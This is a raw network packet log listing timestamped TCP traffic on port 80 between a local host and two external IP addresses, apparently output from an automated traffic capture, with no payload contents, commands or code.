Aug 10, 2024 16:12:22.675640106 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.675640106 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.675640106 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.675671101 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676228046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676239967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676249981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676261902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676275015 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676280022 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676304102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676716089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676733971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676743984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676754951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676773071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676783085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676784992 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676784992 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676794052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676805019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676815987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676826954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676836967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676843882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676843882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676857948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676863909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676875114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676882982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676892042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676903963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.676930904 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676930904 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.676969051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.677150011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.677161932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.677170992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.677182913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.677194118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.677257061 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.677257061 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.677350044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.677995920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.678009033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.678020954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.678035021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.678046942 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.678082943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.678107023 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.679063082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679075003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679085970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679096937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679106951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679135084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.679135084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.679203033 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.679444075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679455996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679501057 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.679507017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.679514885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679527044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679537058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679544926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.679553986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.679565907 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.679580927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.679599047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.680401087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.680412054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.680422068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.680433989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.680444956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.680457115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.680463076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.680466890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.680504084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.680525064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.681293011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.681401014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.681411982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.681421041 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.681435108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.681442976 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.681449890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.681458950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.681467056 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.681477070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.681495905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.681533098 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.682219982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.682231903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.682243109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.682255030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.682265997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.682279110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.682300091 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.682332039 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.682332039 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.683011055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.683022976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.683053017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.683065891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.683079004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.683090925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.683101892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.683111906 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.683120012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.683129072 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.683136940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.683146000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.683162928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.683212042 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.684024096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684043884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684056997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684067965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684079885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684087992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.684098959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684108973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684130907 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.684165001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.684165001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.684742928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684755087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684763908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684775114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684784889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684796095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684807062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684809923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.684809923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.684818983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.684834957 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.685060024 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.685653925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.685676098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.685698032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.685718060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.685738087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.685753107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.685753107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.685760021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.685781002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.685801983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.685801983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.685827017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.686577082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.686599016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.686619997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.686634064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.686634064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.686640978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.686662912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.686683893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.686687946 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.686705112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.686706066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.686727047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.686765909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.686765909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.687473059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.687494040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.687514067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.687530994 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.687536001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.687556982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.687563896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.687577963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.687598944 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.687598944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.687649012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.687649012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.688451052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.688472986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.688509941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.688509941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.688528061 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.688532114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.688551903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.688572884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.688575983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.688575983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.688594103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.688613892 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.688613892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.688613892 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.688657045 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.688657045 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.689260006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.689281940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.689301968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.689322948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.689332962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.689343929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.689351082 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.689351082 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.689368963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.689380884 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.689395905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.689398050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.689445019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.689445019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.705724955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.705774069 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.705876112 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.705888033 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.705908060 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.705931902 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.706051111 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.706063986 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.706094980 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.706110001 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.706530094 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.706702948 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.706737041 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.706762075 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.706794977 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.707039118 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.707096100 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.707724094 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.707739115 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.707753897 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.707771063 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.707789898 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.708091974 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.708103895 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.708115101 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.708136082 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.708157063 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.708267927 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.708278894 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.708288908 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.708326101 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.708339930 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.708704948 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.708724022 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.708736897 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.708751917 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.708754063 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.708770037 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.708794117 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.709067106 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709078074 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709084034 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709090948 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709111929 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.709131002 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.709412098 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709451914 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.709583998 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709594965 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709631920 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.709743023 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709755898 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709765911 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709777117 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709789038 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.709790945 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.709811926 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.709840059 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.710503101 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.710520983 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.710530996 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.710541964 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.710551977 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.710552931 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.710572958 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.710588932 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.711009026 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.711060047 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.711180925 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.711200953 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.711220980 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.711235046 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.711239100 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.711330891 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.737685919 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.737725019 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.737739086 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.737760067 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.737811089 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.738029003 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738060951 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738090038 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.738094091 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738097906 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.738130093 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738176107 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.738176107 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.738396883 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738462925 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.738564014 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738579988 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738591909 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738604069 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738616943 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.738616943 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.738668919 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.738903999 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738917112 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.738944054 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.738955975 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.739070892 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.739080906 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.739092112 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.739115000 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.739129066 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.739228010 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.739239931 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.739260912 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.739284039 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.739587069 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.739633083 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.739736080 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.739748955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.739758968 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.739769936 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.739775896 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.739790916 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.739824057 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.740381956 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.740401983 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.740439892 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.740456104 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.740554094 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.740566015 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.740575075 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.740586996 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.740597010 CEST	80	49741	185.215.113.16	192.168.2.4
